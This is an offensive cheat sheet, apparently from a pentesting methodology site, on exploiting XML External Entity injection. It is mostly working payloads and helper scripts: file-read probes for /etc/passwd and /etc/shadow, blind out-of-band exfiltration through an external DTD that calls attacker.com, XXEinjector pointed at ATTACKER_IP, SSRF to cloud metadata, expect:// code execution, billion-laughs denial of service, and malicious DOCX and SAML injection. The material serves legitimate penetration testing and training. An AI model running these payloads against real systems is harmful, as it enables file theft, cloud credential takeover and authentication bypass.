XXE | JinPwn

XML External Entity injection: user-supplied XML is parsed with external entities enabled. Impact: file read, SSRF, sometimes RCE.

T=https://target.com

i. Where it lives

XML parsers are everywhere, often hidden:

Obvious:

SOAP endpoints
REST APIs accepting Content-Type: application/xml or text/xml
RSS / Atom feed readers
WebDAV endpoints
XML-RPC interfaces (often at /xmlrpc.php)

Hidden inside other formats (every modern Office doc is a zip of XML):

DOCX, XLSX, PPTX uploads - word/document.xml, xl/workbook.xml (ODF files such as ODT use content.xml)
SVG uploads - entire format is XML
PDF uploads (some processors parse embedded XML metadata)
XMP metadata in images
ICS calendar uploads
KML / KMZ (Google Earth) uploads
OOXML in older Office processors

Inside auth flows:

SAML assertions (signed XML)
WS-Security tokens
XML-based OAuth implementations

Inside DBs and APIs:

GraphQL with XML response support enabled
BaseX, eXist-db, MarkLogic DBs over HTTP

Signal that XML is being parsed:

App accepts XML-shaped bodies and returns parsed content
Filename ends .xml, .svg, .docx, .xlsx
Content-Type: application/xml in request or response
Error messages mention SAXParseException, XMLParser, lxml
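
The signals above can be folded into a quick triage helper. This is a minimal sketch: `xml_signals` is a hypothetical name, and the extra content types (`application/soap+xml`, `image/svg+xml`, any `+xml` suffix) are assumptions added for illustration rather than part of the list above.

```python
# Hypothetical triage helper; names and the extra content types are assumptions.
XML_CONTENT_TYPES = ("application/xml", "text/xml", "application/soap+xml", "image/svg+xml")
XML_EXTENSIONS = (".xml", ".svg", ".docx", ".xlsx")
PARSER_ERROR_HINTS = ("SAXParseException", "XMLParser", "lxml")


def xml_signals(content_type="", filename="", body=""):
    """Return the names of the signals suggesting an XML parser is involved."""
    signals = []
    # Drop parameters such as "; charset=utf-8" before comparing.
    ct = content_type.split(";")[0].strip().lower()
    if ct in XML_CONTENT_TYPES or ct.endswith("+xml"):
        signals.append("content-type")
    if filename.lower().endswith(XML_EXTENSIONS):
        signals.append("extension")
    if any(hint in body for hint in PARSER_ERROR_HINTS):
        signals.append("parser-error")
    if body.lstrip().startswith("<?xml"):
        signals.append("xml-body")
    return signals
```

An empty list does not prove the absence of an XML parser; it only means none of these cheap checks fired.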

ii. Quick detection

Send a request with a basic external entity probe. The classic file-read test:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<root>&x;</root>

When /etc/passwd contents appear in the response, you’re in.

When you see no body change, switch to OOB blind XXE - see section iv.
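
A rough sketch of building the probe and checking a response for passwd-style lines. `build_probe` and `shows_passwd` are hypothetical helpers, and the regex is a heuristic (a `name:field:uid:gid:` shape), not a guarantee that the file was read.

```python
import re


def build_probe(path="/etc/passwd", root="root"):
    """Build the classic in-band file-read probe for the given absolute path."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY x SYSTEM "file://{path}">]>\n'
        f"<{root}>&x;</{root}>"
    )


# Heuristic: a passwd entry looks like name:password:uid:gid:...
PASSWD_LINE = re.compile(r"\b[A-Za-z_][\w.-]*:[^:\n]*:\d+:\d+:")


def shows_passwd(body):
    """Return True when the response body contains a passwd-shaped line."""
    return bool(PASSWD_LINE.search(body))
```

Send `build_probe()` as the request body with whatever client you already use, then pass the response text to `shows_passwd`.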

iii. Burp + tooling

Burp’s Pro scanner includes active XXE checks. For manual testing in Burp:

Send request to Repeater
Drop in a probe payload from PayloadsAllTheThings
Watch the response

XXEinjector for automated extraction:

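ruby XXEinjector.rb --host=ATTACKER_IP --httpport=8000 --path=/etc --file=request.txt
## --host is your own IP: XXEinjector starts its listeners there, so it must be an address the target can reach
## Reads the HTTP request in request.txt and enumerates /etc over an out-of-band channel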

oxml_xxe for crafting XXE payloads inside DOCX/XLSX/PPTX:

git clone https://github.com/BuffaloWill/oxml_xxe
ruby ./oxml_xxe.rb
## Loads in browser, lets you build a malicious office doc and download

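dotdotpwn for generating traversal path patterns to place in the entity's SYSTEM URI (it has no XXE module of its own, so print them with the stdout module):

dotdotpwn -m stdout -o unix -d 6 -f /etc/passwd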

iv. Blind XXE via OAST

Most modern parsers do not reflect expanded entities in the response. Use OOB exfiltration via a parameter entity that resolves to your server:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % ext SYSTEM "http://attacker.com/x.dtd">
%ext;
]>
<root>test</root>

Your server hosts x.dtd:

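<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?%data;'>">
%param1;
%exfil;

The target fetches your DTD, reads /etc/passwd into %data;, and requests the exfil URL with the file contents in the query string. %exfil; has to be referenced for the request to fire, and the inner % is written as &#x25; because a bare % inside an entity value is read as the start of a parameter-entity reference. Multi-line files often break the URL, so start with a single-line file such as /etc/hostname.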
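
A minimal sketch that generates the trigger document and the matching external DTD for a given listener. `build_oob_pair` is a hypothetical helper, the default target file is an assumption chosen because single-line files survive a URL better, and the DTD uses the nested parameter-entity form so the callback fires without any entity reference in the document body.

```python
def build_oob_pair(listener, target_file="/etc/hostname"):
    """Return (trigger_document, external_dtd) for a blind XXE test.

    listener is the base URL of a server you control (assumption: it serves
    the returned DTD at /x.dtd and logs incoming requests).
    """
    listener = listener.rstrip("/")
    trigger = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % ext SYSTEM "{listener}/x.dtd">\n'
        "%ext;\n"
        "]>\n"
        "<root>test</root>"
    )
    dtd = (
        f'<!ENTITY % data SYSTEM "file://{target_file}">\n'
        # &#x25; is an escaped '%': it lets param1 declare another parameter entity.
        '<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM '
        f"'{listener}/?%data;'>\">\n"
        "%param1;\n"
        "%exfil;\n"
    )
    return trigger, dtd
```

Write the second string to `x.dtd` on the listener and send the first as the request body; a hit on the listener carrying the file contents in the query string confirms the issue.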

interactsh / Burp Collaborator as the listener:

interactsh-client
## Or use Burp's built-in Collaborator

Many parsers (libxml2 default) accept the external DTD fetch even when in-band entity expansion is disabled.

v. PHP filter chain for base64 file read

When the file you want contains bytes that break XML (NUL, control characters, or raw < and &), encode it with a PHP filter first. Works only when the target is PHP and php://filter is available:

<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">

Returns base64 in the response. Decode on your side.
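
Decoding can be scripted. The sketch below pulls the longest base64-looking run out of a response body and decodes it; `decode_longest_base64` is a hypothetical helper and the 16-character minimum is an arbitrary assumption to skip short tag names.

```python
import base64
import binascii
import re
from typing import Optional

# Runs of base64 alphabet characters, optionally padded. Threshold is an assumption.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_longest_base64(body: str) -> Optional[bytes]:
    """Decode the longest valid base64 run found in body, or return None."""
    candidates = sorted(B64_RUN.findall(body), key=len, reverse=True)
    for candidate in candidates:
        try:
            return base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            # Not valid base64 (wrong length or padding); try the next run.
            continue
    return None
```

The result is returned as bytes so that binary files are preserved; call `.decode()` on it only when you expect text.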

vi. SVG upload XXE

SVG is XML. Many image-handling pipelines (avatar upload, profile photo) pass SVG through a parser before stripping or converting.

Minimal test SVG:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&x;</text>
</svg>

Upload, view the rendered image. The hostname appears in the text.

Variant: librsvg + ImageMagick processing the SVG can be combined with ImageTragick-style exploits.

vii. Office document XXE (DOCX, XLSX, PPTX)

These are zip archives containing XML. Inject XXE into one of the inner XML files:

unzip target.docx -d unpacked/
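## Edit unpacked/word/document.xml - add the DOCTYPE right after the <?xml ... ?> declaration, before the root element
## Reference the entity (&x;) in body text, or use a parameter entity for OOB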
## Repack:
cd unpacked && zip -r ../malicious.docx .

Then upload to the target’s “open document” feature. Common in cv-parser, doc-to-pdf, OCR services.
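
The unzip, edit, and repack steps can also be done in memory. This is a sketch under assumptions: `inject_doctype` and `repack_with_xxe` are hypothetical helpers, the inner file is assumed to be UTF-8, and the DOCTYPE string is supplied by the caller.

```python
import io
import zipfile


def inject_doctype(xml_text, doctype):
    """Insert a DOCTYPE right after the XML declaration, or at the very top."""
    if xml_text.lstrip().startswith("<?xml"):
        end = xml_text.index("?>") + 2
        return xml_text[:end] + "\n" + doctype + xml_text[end:]
    return doctype + "\n" + xml_text


def repack_with_xxe(docx_bytes, inner, doctype):
    """Copy every archive member, patching only the member named by inner."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == inner:
                data = inject_doctype(data.decode("utf-8"), doctype).encode("utf-8")
            # Reusing the ZipInfo keeps the original name, order, and compression.
            dst.writestr(item, data)
    return out.getvalue()
```

Typical use: read `target.docx` as bytes, call `repack_with_xxe(data, "word/document.xml", doctype)`, and write the result to `malicious.docx`.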

viii. SAML XXE

SAML responses are XML. If the SAML library doesn’t disable external entities, you have XXE in an auth flow.

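Test by intercepting a SAML response with Burp and the SAML Raider extension, injecting an external entity into the assertion, and replaying it. If the SP returns parser errors, makes an outbound request, or accepts the assertion with the injected entity, the parser is vulnerable. Many libraries parse the XML before verifying the signature, so a broken signature does not necessarily stop the entity from being resolved.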
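
Outside Burp, the same edit can be scripted. The sketch below assumes the HTTP-POST binding, where the SAMLResponse form field is plain base64 (the Redirect binding additionally deflates the XML and is not handled here). `inject_into_saml` is a hypothetical helper.

```python
import base64


def inject_into_saml(saml_response_b64, doctype):
    """Decode a base64 SAMLResponse, insert a DOCTYPE, and re-encode it.

    Assumes the value has already been URL-decoded and is UTF-8 XML.
    """
    xml_text = base64.b64decode(saml_response_b64).decode("utf-8")
    if xml_text.lstrip().startswith("<?xml"):
        # A DOCTYPE must come after the XML declaration.
        end = xml_text.index("?>") + 2
        patched = xml_text[:end] + doctype + xml_text[end:]
    else:
        patched = doctype + xml_text
    return base64.b64encode(patched.encode("utf-8")).decode("ascii")
```

URL-encode the returned value again before placing it back into the form body.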

ix. XXE to SSRF

Any URL handler in an entity becomes SSRF. The payload reads from your URL of choice:

<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/">

Standard SSRF targets apply - see WEB12 SSRF. Cloud metadata endpoints are the highest-value targets (see Cloud Recon section viii for AWS / Azure / GCP IMDS).

Java parsers also support ftp://, the jar: scheme (as in jar:http://host/x.jar!/), and on older JDKs sometimes netdoc: or gopher://, which expands the attack surface.

x. XXE to RCE

Direct RCE via XXE is rare and language-specific:

PHP with expect:// wrapper enabled (rare default):
```
<!ENTITY x SYSTEM "expect://id">
```
Java with the jar: scheme plus a crafted JAR fetch (older parsers)
XSLT injection alongside XXE in some processors

For most cases, XXE → file read of credentials → use creds elsewhere → RCE.

xi. Billion laughs (DoS, mostly informational)

Nested entity expansion grows exponentially and exhausts memory:

<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...
<root>&lol9;</root>

DoS only. Mention it in the report, but don’t trigger it on production targets.
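
For the report, the expansion size can be worked out without sending anything. A small sketch, assuming the naming used above (`lol` is level 1, `lol2` is level 2, and each level references the previous one ten times); `expanded_size` is a hypothetical helper.

```python
def expanded_size(level, fanout=10, base="lol"):
    """Bytes produced by expanding the entity at the given level.

    Level 1 is the base entity itself; each further level repeats the
    previous one `fanout` times, so the size grows as fanout ** (level - 1).
    """
    return len(base.encode("utf-8")) * fanout ** (level - 1)


if __name__ == "__main__":
    for level in (1, 3, 6, 9):
        print(level, expanded_size(level))
```

With nine levels as in the payload above, `&lol9;` expands to 300,000,000 bytes from a declaration well under a kilobyte.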

xii. Tricks worth knowing

Try without `<?xml` prolog

Some parsers tolerate a missing XML declaration. Also try injecting into JSON endpoints that fall back to XML parsing on certain content types.

Content-Type confusion

Send XML body to a JSON-accepting endpoint:

curl -X POST "$T/api/users" \
  -H 'Content-Type: application/xml' \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]><user><name>&x;</name></user>'

Some frameworks auto-detect content type and parse based on body shape, not header.
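
When the endpoint normally takes JSON, it helps to mirror the JSON field names in the XML body. The sketch below converts a flat JSON object into an equivalent XML document with the entity placed in one chosen field. `json_to_xxe_xml` is a hypothetical helper, nested objects are not handled, and whether the target maps XML elements to the same fields is an assumption to verify per framework.

```python
import json
from xml.sax.saxutils import escape


def json_to_xxe_xml(json_body, root, target_field, path="/etc/passwd"):
    """Turn a flat JSON object into XML, putting &x; in target_field."""
    fields = json.loads(json_body)
    parts = []
    for key, value in fields.items():
        # Only the chosen field carries the entity; other values are escaped.
        text = "&x;" if key == target_field else escape(str(value))
        parts.append(f"<{key}>{text}</{key}>")
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE foo [<!ENTITY x SYSTEM "file://{path}">]>'
        f"<{root}>{''.join(parts)}</{root}>"
    )
```

The output can be passed to the curl command above as the `-d` value.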

XInclude when full XXE is blocked

XInclude is a separate XML feature that allows inclusion of external resources. Sometimes enabled even when DTD parsing is disabled:

<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>

Don’t forget XSLT

XML processing pipelines sometimes accept XSLT transformations from user input. XSLT abuses include file read, SSRF, and depending on the processor, code execution.

XPath injection is the other XML bug

When user input is concatenated into an XPath query (not in the document but in the query selector), you can extract data similarly to SQLi. Common in LDAP-XPath bridges and XML DBs.

xiii. References

PortSwigger - XXE - best guided lab
PayloadsAllTheThings - XXE
HackTricks - XXE
oxml_xxe - office doc XXE generator
SAML Raider - Burp extension for SAML XXE

xiv. Where it leads

File read → /etc/passwd, /etc/shadow (if readable), SSH keys, app configs, cloud credentials
SSRF via XXE → cloud metadata → cloud takeover via AWS / Azure / GCP
Source code read → find more bugs offline (look for hardcoded creds, SQL queries, deserialization sinks)
SAML XXE → auth bypass / impersonate any user
PHP expect:// → direct RCE → 04 Initial Access
